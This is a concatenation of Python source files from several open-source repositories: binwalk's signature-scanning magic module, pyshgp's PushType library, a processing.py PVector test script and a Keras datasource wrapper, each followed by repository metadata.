tag = match.group().replace('{', '').replace('}', '')
# If the tag specifies a value, it will be colon delimited
# (e.g., '{name:%s}')
if ':' in tag:
(n, v) = tag.split(':', 1)
else:
n = tag
v = True
# Create a new SignatureTag instance and append it to self.tags
self.tags[n] = v
# Remove all tags from the printable format string
self.format = retag.sub('', self.format).strip()
else:
self.format = ""
class Signature(object):
'''
Class to hold signature data and generate signature regular expressions.
'''
def __init__(self, id, first_line):
'''
Class constructor.
@id - A ID value to uniquely identify this signature.
@first_line - The first SignatureLine of the signature (subsequent
SignatureLines should be added via self.append).
Returns None.
'''
self.id = id
self.lines = [first_line]
self.title = first_line.format
self.offset = first_line.offset
self.regex = self._generate_regex(first_line)
try:
self.confidence = first_line.tags['confidence']
except KeyError:
self.confidence = first_line.size
def _generate_regex(self, line):
'''
Generates a regular expression from the magic bytes of a signature.
The regex is used by Magic._analyze.
@line - The first SignatureLine object of the signature.
Returns a compile regular expression.
'''
restr = ""
# Strings and single byte signatures are taken at face value;
# multi-byte integer values are turned into regex strings based
# on their data type size and endianess.
if line.type == 'regex':
# Regex types are already compiled expressions.
# Note that since re.finditer is used, unless the specified
# regex accounts for it, overlapping signatures will be ignored.
return line.value
if line.type == 'string':
restr = line.value
elif line.size == 1:
restr = chr(line.value)
elif line.size == 2:
if line.endianess == '<':
restr = chr(line.value & 0xFF) + chr(line.value >> 8)
elif line.endianess == '>':
restr = chr(line.value >> 8) + chr(line.value & 0xFF)
elif line.size == 4:
if line.endianess == '<':
restr = (chr(line.value & 0xFF) +
chr((line.value >> 8) & 0xFF) +
chr((line.value >> 16) & 0xFF) +
chr(line.value >> 24))
elif line.endianess == '>':
restr = (chr(line.value >> 24) +
chr((line.value >> 16) & 0xFF) +
chr((line.value >> 8) & 0xFF) +
chr(line.value & 0xFF))
elif line.size == 8:
if line.endianess == '<':
restr = (chr(line.value & 0xFF) +
chr((line.value >> 8) & 0xFF) +
chr((line.value >> 16) & 0xFF) +
chr((line.value >> 24) & 0xFF) +
chr((line.value >> 32) & 0xFF) +
chr((line.value >> 40) & 0xFF) +
chr((line.value >> 48) & 0xFF) +
chr(line.value >> 56))
elif line.endianess == '>':
restr = (chr(line.value >> 56) +
chr((line.value >> 48) & 0xFF) +
chr((line.value >> 40) & 0xFF) +
chr((line.value >> 32) & 0xFF) +
chr((line.value >> 24) & 0xFF) +
chr((line.value >> 16) & 0xFF) +
chr((line.value >> 8) & 0xFF) +
chr(line.value & 0xFF))
# Since re.finditer is used on a per-signature basis, signatures should be crafted carefully
# to ensure that they aren't potentially self-overlapping (e.g., a signature of "ABCDAB" could
# be confused by the byte sequence "ABCDABCDAB"). The longer the signature, the less likely an
# unintentional overlap is, although files could still be maliciously crafted to cause false
# negative results.
#
# Thus, unless a signature has been explicitly marked as knowingly overlapping ('{overlap}'),
# spit out a warning about any self-overlapping signatures.
if not binwalk.core.compat.has_key(line.tags, 'overlap'):
for i in range(1, line.size):
if restr[i:] == restr[0:(line.size - i)]:
binwalk.core.common.warning(
"Signature '%s' is a self-overlapping signature!" % line.text)
break
return re.compile(re.escape(restr))
def append(self, line):
'''
Add a new SignatureLine object to the signature.
@line - A new SignatureLine instance.
Returns None.
'''
# This method is kind of useless, but may be a nice wrapper for future
# code.
self.lines.append(line)
class Magic(object):
'''
Primary class for loading signature files and scanning
blocks of arbitrary data for matching signatures.
'''
def __init__(self, exclude=[], include=[], invalid=False):
'''
Class constructor.
@include - A list of regex strings describing which signatures should be included in the scan results.
@exclude - A list of regex strings describing which signatures should not be included in the scan results.
@invalid - If set to True, invalid results will not be ignored.
Returns None.
'''
# Used to save the block of data passed to self.scan (see additional
# comments in self.scan)
self.data = ""
# A list of Signature class objects, populated by self.parse (see also:
# self.load)
self.signatures = []
# A set of signatures with the 'once' keyword that have already been
# displayed once
self.display_once = set()
self.dirty = True
self.show_invalid = invalid
self.includes = [re.compile(x) for x in include]
self.excludes = [re.compile(x) for x in exclude]
# Regex rule to replace backspace characters (an the preceeding character)
# in formatted signature strings (see self._analyze).
self.bspace = re.compile(".\\\\b")
# Regex rule to match printable ASCII characters in formatted signature
# strings (see self._analyze).
self.printable = re.compile("[ -~]*")
# Regex rule to find format strings
self.fmtstr = re.compile("%[^%]")
# Regex rule to find periods (see self._do_math)
self.period = re.compile("\.")
def _filtered(self, text):
'''
Tests if a string should be filtered out or not.
@text - The string to check against filter rules.
Returns True if the string should be filtered out, i.e., not displayed.
Returns False if the string should be displayed.
'''
filtered = None
# Text is converted to lower case first, partially for historical
# purposes, but also because it simplifies writing filter rules
# (e.g., don't have to worry about case sensitivity).
text = text.lower()
for include in self.includes:
if include.search(text):
filtered = False
break
# If exclusive include filters have been specified and did
# not match the text, then the text should be filtered out.
if self.includes and filtered is None:
return True
for exclude in self.excludes:
if exclude.search(text):
filtered = True
break
# If no explicit exclude filters were matched, then the
# text should *not* be filtered.
if filtered is None:
filtered = False
return filtered
def _do_math(self, offset, expression):
'''
Parses and evaluates complex expressions, e.g., "(4.l+12)", "(6*32)", etc.
@offset - The offset inside self.data that the current signature starts at.
@expressions - The expression to evaluate.
Returns an integer value that is the result of the evaluated expression.
'''
# Does the expression contain an offset (e.g., "(4.l+12)")?
if '.' in expression and '(' in expression:
replacements = {}
for period in [match.start() for match in self.period.finditer(expression)]:
# Separate the offset field into the integer offset and type
# values (o and t respsectively)
s = expression[:period].rfind('(') + 1
# The offset address may be an evaluatable expression, such as '(4+0.L)', typically the result
# of the original offset being something like '(&0.L)'.
o = binwalk.core.common.MathExpression(
expression[s:period]).value
t = expression[period + 1]
# Re-build just the parsed offset portion of the expression
text = "%s.%c" % (expression[s:period], t)
# Have we already evaluated this offset expression? If so, skip
# it.
if binwalk.core.common.has_key(replacements, text):
continue
# The offset specified in the expression is relative to the
# starting offset inside self.data
o += offset
# Read the value from self.data at the specified offset
try:
# Big and little endian byte format
if t in ['b', 'B']:
v = struct.unpack(
'b', binwalk.core.compat.str2bytes(self.data[o:o + 1]))[0]
# Little endian short format
elif t == 's':
v = struct.unpack(
'<h', binwalk.core.compat.str2bytes(self.data[o:o + 2]))[0]
# Little endian long format
elif t == 'l':
v = struct.unpack(
'<i', binwalk.core.compat.str2bytes(self.data[o:o + 4]))[0]
# Big endian short format
elif t == 'S':
v = struct.unpack(
'>h', binwalk.core.compat.str2bytes(self.data[o:o + 2]))[0]
# Bit endian long format
elif t == 'L':
v = struct.unpack(
'>i', binwalk.core.compat.str2bytes(self.data[o:o + 4]))[0]
# struct.error is thrown if there is not enough bytes in
# self.data for the specified format type
except struct.error as e:
v = 0
# Keep track of all the recovered values from self.data
replacements[text] = v
# Finally, replace all offset expressions with their corresponding
# text value
v = expression
for (text, value) in binwalk.core.common.iterator(replacements):
v = v.replace(text, "%d" % value)
# If no offset, then it's just an evaluatable math expression (e.g.,
# "(32+0x20)")
else:
v = expression
# Evaluate the final expression
value = binwalk.core.common.MathExpression(v).value
return value
def _analyze(self, signature, offset):
'''
Analyzes self.data for the specified signature data at the specified offset .
@signature - The signature to apply to the data.
@offset - The offset in self.data to apply the signature to.
Returns a dictionary of tags parsed from the data.
'''
description = []
tag_strlen = None
max_line_level = 0
previous_line_end = 0
tags = {'id': signature.id, 'offset':
offset, 'invalid': False, 'once': False}
# Apply each line of the signature to self.data, starting at the
# specified offset
for n in range(0, len(signature.lines)):
line = signature.lines[n]
# Ignore indentation levels above the current max indent level
if line.level <= max_line_level:
# If the relative offset of this signature line is just an
# integer value, use it
if isinstance(line.offset, int):
line_offset = line.offset
# Else, evaluate the complex expression
else:
# Format the previous_line_end value into a string. Add the '+' sign to explicitly
# state that this value is to be added to any subsequent values in the expression
# (e.g., '&0' becomes '4+0').
ple = '%d+' % previous_line_end
# Allow users to use either the '&0' (libmagic) or '&+0' (explcit addition) sytaxes;
# replace both with the ple text.
line_offset_text = line.offset.replace(
'&+', ple).replace('&', ple)
# Evaluate the expression
line_offset = self._do_math(offset, line_offset_text)
# Sanity check
if not isinstance(line_offset, int):
raise ParserException(
"Failed to convert offset '%s' to a number: '%s'" % (line.offset, line.text))
# The start of the data needed by this line is at offset + line_offset.
# The end of the data will be line.size bytes later.
start = offset + line_offset
end = start + line.size
# If the line has a packed format string, unpack it
if line.pkfmt:
try:
dvalue = struct.unpack(
line.pkfmt, binwalk.core.compat.str2bytes(self.data[start:end]))[0]
# Not enough bytes left in self.data for the specified
# format size
except struct.error as e:
dvalue = 0
# Else, this is a string
else:
# Wildcard strings have line.value == None
if line.value is None:
# Check to see if this is a string whose size is known and has been specified on a previous
# signature line.
if binwalk.core.compat.has_key(tags, 'strlen') and binwalk.core.compat.has_key(line.tags, 'string'):
dvalue = self.data[start:(start + tags['strlen'])]
# Else, just terminate the string at the first newline,
# carriage return, or NULL byte
else:
dvalue = self.data[start:end].split(
'\x00')[0].split('\r')[0].split('\n')[0]
# Non-wildcard strings have a known length, specified in
# the signature line
else:
dvalue = self.data[start:end]
# Some integer values have special operations that need to be performed on them
# before comparison (e.g., "belong&0x0000FFFF"). Complex math expressions are
# supported here as well.
# if isinstance(dvalue, int) and line.operator:
if line.operator:
try:
# If the operator value of this signature line is just
# an integer value, use it
if isinstance(line.opvalue, int) or isinstance(line.opvalue, long):
opval = line.opvalue
# Else, evaluate the complex expression
else:
opval = self._do_math(offset, line.opvalue)
# Perform the specified operation
if line.operator == '&':
dvalue &= opval
elif line.operator == '|':
dvalue |= opval
elif line.operator == '*':
dvalue *= opval
elif line.operator == '+':
dvalue += opval
elif line.operator == '-':
dvalue -= opval
elif line.operator == '/':
dvalue /= opval
elif line.operator == '~':
dvalue = ~opval
elif line.operator == '^':
dvalue ^= opval
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise ParserException("Operation '" + str(dvalue) + " " + str(
line.operator) + "= " + str(line.opvalue) + "' failed: " + str(e))
# Does the data (dvalue) match the specified comparison?
if ((line.value is None) or
(line.regex and line.value.match(dvalue)) or
(line.condition == '=' and dvalue == line.value) or
(line.condition == '>' and dvalue > line.value) or
(line.condition == '<' and dvalue < line.value) or
(line.condition == '!' and dvalue != line.value) or
(line.condition == '~' and (dvalue == ~line.value)) or
(line.condition == '^' and (dvalue ^ line.value)) or
(line.condition == '&' and (dvalue & line.value)) or
(line.condition == '|' and (dvalue | line.value))):
# Up until this point, date fields are treated as integer values,
# but we want to display them as nicely formatted strings.
if line.type == 'date':
ts = datetime.datetime.utcfromtimestamp(dvalue)
dvalue = ts.strftime("%Y-%m-%d %H:%M:%S")
# Generate the tuple for the format string
dvalue_tuple = ()
for x in self.fmtstr.finditer(line.format):
dvalue_tuple += (dvalue,)
# Format the description string
desc = line.format % dvalue_tuple
# If there was any description string, append it to the
# list of description string parts
if desc:
description.append(desc)
# Process tag keywords specified in the signature line. These have already been parsed out of the
# original format string so that they can be processed
# separately from the printed description string.
for (tag_name, tag_value) in binwalk.core.compat.iterator(line.tags):
# If the tag value is a string, try to format it
if isinstance(tag_value, str):
# Generate the tuple for the format string
dvalue_tuple = ()
for x in self.fmtstr.finditer(tag_value):
dvalue_tuple += (dvalue,)
# Format the tag string
tags[tag_name] = tag_value % dvalue_tuple
# Else, just use the raw tag value
else:
tags[tag_name] = tag_value
# Some tag values are intended to be integer values, so
# try to convert them as such
try:
tags[tag_name] = int(tags[tag_name], 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
pass
# Abort processing soon as this signature is marked invalid, unless invalid results
# were explicitly requested. This means that the sooner invalid checks are made in a
# given signature, the faster the scan can filter out false
# positives.
if not self.show_invalid and tags['invalid']:
break
# Look ahead to the next line in the signature; if its indent level is greater than
# that of the current line, then track the end of data for the current line. This is
# so that subsequent lines can use the '>>&0' offset syntax to specify relative offsets
# from previous lines.
try:
next_line = signature.lines[n + 1]
if next_line.level > line.level:
if line.type == 'string':
previous_line_end = line_offset + len(dvalue)
else:
previous_line_end = line_offset + line.size
except IndexError as e:
pass
# If this line satisfied its comparison, +1 the max
# indentation level
max_line_level = line.level + 1
else:
# No match on the first line, abort
if line.level == 0:
break
else:
# If this line did not satisfy its comparison, then higher
# indentation levels will not be accepted.
max_line_level = line.level
# Join the formatted description strings and remove backspace
# characters (plus the preceeding character as well)
tags['description'] = self.bspace.sub('', " ".join(description))
# This should never happen
if not tags['description']:
tags['display'] = False
tags['invalid'] = True
# If the formatted string contains non-printable characters, consider
# it invalid
if self.printable.match(tags['description']).group() != tags['description']:
tags['invalid'] = True
return tags
def match(self, data):
'''
Match the beginning of a data buffer to a signature.
@data - The data buffer to match against the loaded signature list.
Returns a list of SignatureResult objects.
'''
return self.scan(data, 1)
def scan(self, data, dlen=None):
'''
Scan a data block for matching signatures.
@data - A string of data to scan.
@dlen - If specified, signatures at offsets larger than dlen will be ignored.
Returns a list of SignatureResult objects.
'''
results = []
matched_offsets = set()
# Since data can potentially be quite a large string, make it available to other
# methods via a class attribute so that it doesn't need to be passed around to
# different methods over and over again.
self.data = data
# If dlen wasn't specified, search all of self.data
if dlen is None:
dlen = len(data)
for signature in self.signatures:
# Use regex to search the data block for potential signature
# matches (fast)
for match in signature.regex.finditer(data):
# Take the offset of the start of the signature into account
offset = match.start() - signature.offset
# Signatures are ordered based on the length of their magic bytes (largest first).
# If this offset has already been matched to a previous signature, ignore it unless
# self.show_invalid has been specified. Also ignore obviously invalid offsets (<1)
# as well as those outside the specified self.data range
# (dlen).
if (offset not in matched_offsets or self.show_invalid) and offset >= 0 and offset < dlen:
# if offset >= 0 and offset < dlen:
# Analyze the data at this offset using the current
# signature rule
tags = self._analyze(signature, offset)
# Generate a SignatureResult object and append it to the results list if the
# signature is valid, or if invalid results were requested.
if (not tags['invalid'] or self.show_invalid) and not self._filtered(
tags['description']):
# Only display results with the 'once' tag once.
if tags['once']:
if signature.title in self.display_once:
continue
else:
self.display_once.add(signature.title)
# Append the result to the results list
results.append(SignatureResult(**tags))
# Add this offset to the matched_offsets set, so that it can be ignored by
# subsequent loops.
matched_offsets.add(offset)
# Sort results by offset
results.sort(key=lambda x: x.offset, reverse=False)
return results
def load(self, fname):
'''
Load signatures from a file.
@fname - Path to signature file.
Returns None.
'''
# Magic files must be ASCII, else encoding issues can arise.
fp = open(fname, "r")
lines = fp.readlines()
self.parse(lines)
fp.close()
def parse(self, lines):
'''
Parse signature file lines.
@lines - A list of lines from a signature file.
Returns None.
'''
signature = None
for line in lines:
# Split at the first comment delimiter (if any) and strip the
# result
line = line.split('#')[0].strip()
# Ignore blank lines and lines that are nothing but comments.
# We also don't support the '!mime' style line entries.
if line and line[0] != '!':
# Parse this signature line
sigline = SignatureLine(line)
# Level 0 means the first line of a signature entry
if sigline.level == 0:
# If there is an existing signature, append it to the signature list,
# unless the text in its title field has been filtered by user-defined
# filter rules.
if signature and not self._filtered(signature.title):
self.signatures.append(signature)
# Create a new signature object; use the size of self.signatures to
# assign each signature a unique ID.
signature = Signature(len(self.signatures), sigline)
# Else, just append this line to the existing signature
elif signature:
# signature.append(sigline)
signature.lines.append(sigline)
# If this is not the first line of a signature entry and there is no other
# existing signature entry, something is very wrong with the
# signature file.
else:
raise ParserException(
"Invalid signature line: '%s'" % line)
# Add the final signature to the signature list
if signature:
if not self._filtered(signature.lines[0].format):
self.signatures.append(signature)
# Sort signatures by confidence (aka, length of their magic bytes),
# largest first
self.signatures.sort(key=lambda x: x.confidence, reverse=True)
| {
"repo_name": "sundhaug92/binwalk",
"path": "src/binwalk/core/magic.py",
"copies": "1",
"size": "38818",
"license": "mit",
"hash": 8389380352414143000,
"line_mean": 41.6103183315,
"line_max": 124,
"alpha_frac": 0.5197331135,
"autogenerated": false,
"ratio": 4.816726641022459,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009722471958266906,
"num_lines": 911
} |
"""A PushTypeLibrary describes the PushTypes which a given instance of PushGP will support."""
from typing import Any, Sequence, Tuple, Optional, Set, Callable
from pyshgp.push.types import PushType, CORE_PUSH_TYPES
from pyshgp.push.atoms import Atom, Literal
from pyshgp.validation import PushError
RESERVED_PSEUDO_STACKS = {"untyped", "stdout"}
class PushTypeLibrary(dict):
"""A collection of PushTypes which can support a corresponding PushStack.
Parameters
----------
register_core : bool, optional
If True, all core types will be registered. Default is True.
*args
A collection of PushTypes to register.
Attributes
----------
register_core : bool, optional
If True, all core types will be registered. Default is True.
*args
A collection of PushTypes to register.
"""
def __init__(self, register_core: bool = True, *args):
super().__init__()
if register_core:
self.register_core()
self.register_list(args)
self.create_and_register("code", (Atom,), force=True)
self.create_and_register("exec", (Atom,), force=True)
def register(self, push_type: PushType, _force=False):
"""Register a PushType object.
Parameters
----------
push_type
PushType to register.
_force : bool, optional
For internal use only. Default is False.
Returns
-------
PushTypeLibrary
A reference to the ``PushTypeLibrary``.
"""
name = push_type.name
if (not _force) and (name in RESERVED_PSEUDO_STACKS):
raise ValueError("Cannot register PushType with name {nm} because it is reserved.".format(nm=name))
self[name] = push_type
return self
def create_and_register(self,
name: str,
python_types: Tuple[type, ...],
is_collection: bool = False,
is_numeric: bool = False,
force=False):
"""Create a PushType and register it into the library.
Parameters
----------
name : str
A name for the type. Used when referencing the PushType in Instruction
definitions and will be the key in the PushState for the corresponding
PushStack.
python_types : Tuple[type]
A tuple of python types that correspond to the underlying
native types which the PushType is representing.
is_collection : bool, optional
Indicates if the PushType is a collection. Default is False.
is_numeric : bool, optional
Indicates if the PushType is a number. Default is False.
force : bool
If True, will register the type even if it will overwrite an
existing reserved stack typed (eg. exec, stdout, untyped). Default
is False. It is not recommended this argument be changed unless
you have a very good reason to do so.
Returns
-------
PushTypeLibrary
A reference to the PushTypeLibrary.
"""
p_type = PushType(name, python_types, is_collection=is_collection, is_numeric=is_numeric)
self.register(p_type, force)
return self
def unregister(self, push_type_name: str):
"""Unregister a push type by name.
Parameters
----------
push_type_name
The name of the push type to unregister.
Returns
-------
PushTypeLibrary
A reference to the PushTypeLibrary.
"""
if push_type_name in RESERVED_PSEUDO_STACKS:
raise ValueError("Cannot unregister PushType with name {nm} because it is reserved.".format(nm=push_type_name))
self.pop(push_type_name, None)
return self
def register_list(self, list_of_push_types: Sequence[PushType]):
"""Register a list of PushType objects.
Parameters
----------
list_of_push_types
List of Instruction objects to register.
Returns
-------
PushTypeLibrary
A reference to the PushTypeLibrary.
"""
for push_type in list_of_push_types:
self.register(push_type)
return self
def register_core(self):
"""Register all core PushTypes defined in pyshgp.
Returns
-------
PushTypeLibrary
A reference to the PushTypeLibrary.
"""
for push_type in CORE_PUSH_TYPES:
self.register(push_type)
def supported_stacks(self) -> Set[str]:
"""All stack names which the PushTypeLibrary can support.
Returns
-------
set[str]
A set of stacks names which the type library can support.
"""
return set(self.keys())
def push_type_of(self, thing: Any, error_on_not_found: bool = False) -> Optional[PushType]:
"""Return the PushType of the given thing.
Parameters
----------
thing : Any
Any value to try and find the corresponding PushType.
error_on_not_found : bool, optional
If True, will raise error if no PushType found. Default is False.
Returns
-------
Optional[PushType]
The corresponding PushType of the thing. If no corresponding type, returns None.
"""
for push_type in self.values():
if push_type.is_instance(thing):
return push_type
if error_on_not_found:
raise PushError.no_type(thing)
return None
def push_type_for_type(self, typ: type, error_on_not_found: bool = False) -> Optional[PushType]:
"""Return the PushType of the given python (or numpy) type.
Parameters
----------
typ : type
Any type to try and find the corresponding PushType.
error_on_not_found : bool, optional
If True, will raise error if no PushType found. Default is False.
Returns
-------
Optional[PushType]
The corresponding PushType of the given type. If no corresponding type, returns None.
"""
for push_type in self.values():
if typ in push_type.python_types:
return push_type
if error_on_not_found:
raise PushError.no_type(typ)
return None
def infer_literal(val: Any, type_library: PushTypeLibrary) -> Literal:
"""Make a literal by inferring the PushType of the value.
Parameters
----------
val : Any
Any value to try and make a Literal out of.
type_library : PushTypeLibrary
The library of PushTypes which a Literal can be made of.
Returns
-------
Literal
The Literal object which holds the value and the corresponding PushType.
"""
return Literal(value=val, push_type=type_library.push_type_of(val, error_on_not_found=True))
| {
"repo_name": "erp12/pyshgp",
"path": "pyshgp/push/type_library.py",
"copies": "1",
"size": "7063",
"license": "mit",
"hash": -705865184801138000,
"line_mean": 30.9592760181,
"line_max": 123,
"alpha_frac": 0.585728444,
"autogenerated": false,
"ratio": 4.586363636363636,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5672092080363637,
"avg_score": null,
"num_lines": null
} |
a = PVector()
assert a.x == 0
assert a.y == 0
assert a.z == 0
a = PVector(5, 7, 11)
b = PVector(13, 17, 23)
assert a - b == PVector(-8.0, -10.0, -12.0)
assert b - a == PVector(8, 10, 12)
c = PVector(18, 24, 34)
assert b + a == c
assert a + b == c
assert PVector.add(a, b) == c
assert PVector.add(a, b) == c
a.add(b)
assert a == c
a.add(b)
assert a == PVector(31.0, 41.0, 57.0)
try:
print a * b
raise AssertionError("That shouldn't have happened.")
except TypeError:
pass
c = PVector(310.0, 410.0, 570.0)
assert a * 10 == c
assert a * 10 == c
assert PVector.mult(a, 10) == c
assert PVector.mult(a, 10) == c
a.mult(10)
assert a == c
assert int(1000 * PVector.dist(a, b)) == 736116
assert PVector.cross(a, b) == PVector(-260.0, 280.0, -60.0)
assert a.cross(b) == PVector(-260.0, 280.0, -60.0)
assert PVector.dot(a, b) == 0
d = a.get()
d += b
assert d == a + b
d = a.get()
d -= c
assert d == a - c
d = a.get()
d *= 5.0
assert d == a * 5.0
d = a.get()
d /= 5.0
assert d == a / 5.0
assert b * 5 == b * 5.0
assert b / 5 == b / 5.0
d = b.get()
d *= 391
assert d == b * 391.0
d = b.get()
d /= 10203
assert d == b / 10203.0
d = a.get()
d += a + a
assert d == a + a + a
assert a * 57.0 == 57.0 * a
assert (a / 5.0) == (1.0 / 5.0) * a
m, n = b, c
a += b * 5 - c / 2 + PVector(0, 1, 2)
assert (m, n) == (b, c)
import copy
x = [a, b]
y = copy.deepcopy(x)
assert x == y
x[0].sub(PVector(100, 100, 100))
assert x != y
a = PVector(1, 1)
b = PVector(-2, -2)
assert a < b
assert a <= b
assert b > a
assert b >= a
a = PVector(1, 2, 3)
b = PVector(3, 2, 1)
assert a != b
assert a >= b
assert b >= a
assert a.magSq() == b.magSq()
v1 = PVector(10, 20);
v2 = PVector(60, 80);
a = PVector.angleBetween(v1, v2);
assert a == 0.17985349893569946 # more or less
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/67
assert isinstance(PVector(1,2), PVector)
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/101
v = PVector(10, 20, 0)
d = v.dot(60, 80, 0)
assert d == 2200.0
v2 = PVector(60, 80, 0)
d = v.dot(v2)
assert d == 2200.0
# PVector.add w/multiple arguments
v = PVector(40, 20, 0)
v.add(25, 50, 0)
assert (v.x, v.y, v.z) == (65, 70, 0)
# PVector.sub w/multiple arguments
v = PVector(40, 20, 0)
v.sub(25, 50, 0)
assert (v.x, v.y, v.z) == (15, -30, 0)
# Regression test for https://github.com/jdf/Processing.py-Bugs/issues/102
start = PVector(0.0, 0.0)
end = PVector(100.0, 100.0)
middle = PVector.lerp(start, end, 0.5)
assert middle == PVector(50.0, 50.0)
assert start == PVector(0, 0)
start.lerp(end, .75)
assert start == PVector(75, 75)
assert end == PVector(100.0, 100.0)
end.lerp(200, 200, 0, .5)
assert end == PVector(150.0, 150.0)
print 'OK'
exit()
| {
"repo_name": "mashrin/processing.py",
"path": "testing/resources/test_pvector.py",
"copies": "3",
"size": "2710",
"license": "apache-2.0",
"hash": -8453459603405174000,
"line_mean": 19.0740740741,
"line_max": 74,
"alpha_frac": 0.5926199262,
"autogenerated": false,
"ratio": 2.203252032520325,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9285888758381979,
"avg_score": 0.0019966400676691156,
"num_lines": 135
} |
"""A :py:class:`Datasource` based on predefined keras datasets.
"""
# Generic imports
import os.path
import importlib.util
# cifar10 and cifar100 labels are provided as pickled files
# FIXME[todo]: Six: Python 2 and 3 Compatibility Library - do we need this?
# From the docs: ""Some modules which had two implementations have
# been merged in Python 3. For example, cPickle no longer exists in
# Python 3; it was merged with pickle. In these cases, fetching the
# fast version will load the fast one on Python 2 and the merged
# module in Python 3.""
# from six.moves import cPickle
import pickle
# toolbox imports
from dltb.datasource import Imagesource
from dltb.datasource.array import LabeledArray
from dltb.tool.classifier import ClassScheme
# FIXME[old]: may be this could still be used somehow to check which
# dataset is available ...
# for keras_id in KerasDatasource.KERAS_IDS:
# try:
# KerasDatasource(keras_id)
# except ValueError as err:
# LOG.error("Error instantiating keras data source '%s': %s",
# keras_id, err)
class KerasScheme(ClassScheme):
""":py:class:`ClassScheme` for Keras datasources.
This class adds functionality to load class schemes for
keras datasources 'cifa10', and 'cifar100'.
"""
def __init__(self, *args, name: str = None, variant: str = None,
**kwargs) -> None:
"""
Arguments
---------
dataset: str
The name of the Keras dataset that applies this Scheme.
"""
super().__init__(*args, **kwargs)
self._keras_name = name
self._variant = variant
@property
def prepared(self) -> bool:
"""Check if the :py:class:`ImagenetScheme` has been initialized.
"""
return len(self) > 0
def prepare(self) -> None:
"""Prepare the labels for a Keras dataset.
"""
if self.prepared:
return # nothing to do ...
#
# Set the labels
#
if self._keras_name == 'cifar10':
self.add_labels([str(i) for i in range(10)], 'text')
data_utils = importlib.import_module('keras.utils.data_utils')
# Textual labels are provided in different ways for the different
# Keras datasets.
if self._keras_name == 'cifar10':
path = data_utils.get_file('cifar-10-batches-py', None)
with open(os.path.join(path, "batches.meta"), 'rb') as file:
meta = pickle.load(file)
self.add_labels(meta['label_names'], name='text')
elif self._keras_name == 'cifar100':
path = data_utils.get_file('cifar-100-python', None)
with open(os.path.join(path, "meta"), 'rb') as file:
meta = pickle.load(file)
if self._variant is None or self._variant == 'fine':
self.add_labels(meta['fine_label_names'], 'text')
elif self._variant == 'coarse':
# there is also 'coarse_label_names' with 20 categories
# label [0..100] -> label//5 [0..20]
self.add_labels(meta['coarse_label_names'], 'text')
class KerasDatasource(LabeledArray, Imagesource):
# pylint: disable=too-many-ancestors
"""Data source for Keras builtin datasets [1].
Keras provides some methods to access standard datasets via its
keras.datasets API. This API will automatically download and
unpack required data into `${KERAS_HOME}/datasets/` (if not set,
${KERAS_HOME} defaults to `~/.keras/`; currently there seems to be
no option to specify the download directory for individual
datasets).
Attributes
----------
**Class Attributes**
KERAS_IDS: list
A list of valid names for :py:class:`KerasDatasource`\\ s.
For each name there has to exists a package called
keras.datasets.{name}.
KERAS_DATA: dict
A dictionary holding all loaded keras datasets.
Maps the ID of the dataset to the actual data.
The Keras data are provided as a pair of pairs of arrays:
(x_train, y_train), (x_test, y_test)
That is: data[0][0] are the input data from the training set
and data[0][1] are the corresponding labels.
data[1][0] and data[1][1] are test data and labels.
**Instance Attributes**
_keras_dataset_name: str
The name of the Keras dataset (one of those listed in
KERAS_IDS).
_section_index: int
Index for the section of the dataset: 0 for train and 1 for test.
Links
-----
[1] https://keras.io/api/datasets/
"""
KERAS_IDS = ['mnist', 'cifar10', 'cifar100', 'fashion_mnist']
KERAS_DATA = {}
_keras_dataset_name: str = None
_section_index: int = 0
_variant: str = None
def __init__(self, name: str, section: str = 'train',
key: str = None, **kwargs) -> None:
"""Initialize a keras dataset.
Arguments
---------
name: str
Name of the Keras dataset. This can be any name listed
in KERAS_IDS.
section: str
The section of the dataset, either 'train' or 'test'
Raises
------
ValueError:
There does not exist a package keras.datasets.{name}.
"""
scheme = KerasScheme(name=name)
super().__init__(key=key or f"{name}-{section}",
description=f"Keras Datasoure '{name}-{section}'",
**kwargs)
self._keras_dataset_name = name
self._section_index = 0 if section == 'train' else 1
self._scheme = scheme
@property
def keras_dataset_name(self) -> str:
"""The name of the Keras dataset.
"""
return self._keras_dataset_name
@property
def keras_module_name(self) -> str:
"""Fully qualified name of the keras module representing this dataset.
"""
return 'keras.datasets.' + self._keras_dataset_name
def _preparable(self) -> bool:
"""Check if this Datasource is available.
Returns
-------
True if the Datasource can be instantiated, False otherwise.
"""
module_spec = importlib.util.find_spec(self.keras_module_name)
return module_spec is not None and super()._preparable
def _prepare(self):
"""Prepare this :py:class:`KerasDatasource`.
This includes import the corresponding keras module and
loading label names if available.
"""
super()._prepare()
name = self._keras_dataset_name
if name not in self.KERAS_DATA:
module = importlib.import_module(self.keras_module_name)
self.KERAS_DATA[name] = module.load_data()
self._array, self._labels = self.KERAS_DATA[name][self._section_index]
self._description = f'keras.datasets.{name}'
if name == 'cifar100':
# there exist two variants of the cifar100 dataset:
# the "fine" one with 100 labels and a "coarse" one with
# only 20 labels.
self._variant = 'fine'
if name == 'cifar100' and self._variant == 'coarse':
# FIXME[todo]: we have to find the mapping from "fine"
# labels to "coarse" labels as provided on
# https://www.cs.toronto.edu/~kriz/cifar.html
self._labels = self._labels//5
def __str__(self):
# return Predefined.__str__(self) + ': ' + DataArray.__str__(self)
# return self._keras_dataset_name + ': ' + DataArray.__str__(self)
return "Keras Dataset: " + self._keras_dataset_name
| {
"repo_name": "Petr-By/qtpyvis",
"path": "dltb/thirdparty/keras/datasource.py",
"copies": "1",
"size": "7668",
"license": "mit",
"hash": -2493869317927171000,
"line_mean": 33.5405405405,
"line_max": 78,
"alpha_frac": 0.5953312467,
"autogenerated": false,
"ratio": 3.938366718027735,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5033697964727735,
"avg_score": null,
"num_lines": null
} |
"""A :py:class:`Datasource` providing data from an array.
"""
# FIXME[todo]: add the option to work with numpy memmap
# np.memmap(filename, dtype='float32', mode='w+',
# shape=(samples,) + network[layer].output_shape[1:])
#
# Notice: the filen referred to by filename has to by an
# (uncompressed) `.npy` file. There is not way to use compressed `.npz`
# files.
# third party imports
import numpy as np
# toolbox imports
from ..base.data import Data
from ..tool.classifier import ClassScheme, ClassIdentifier
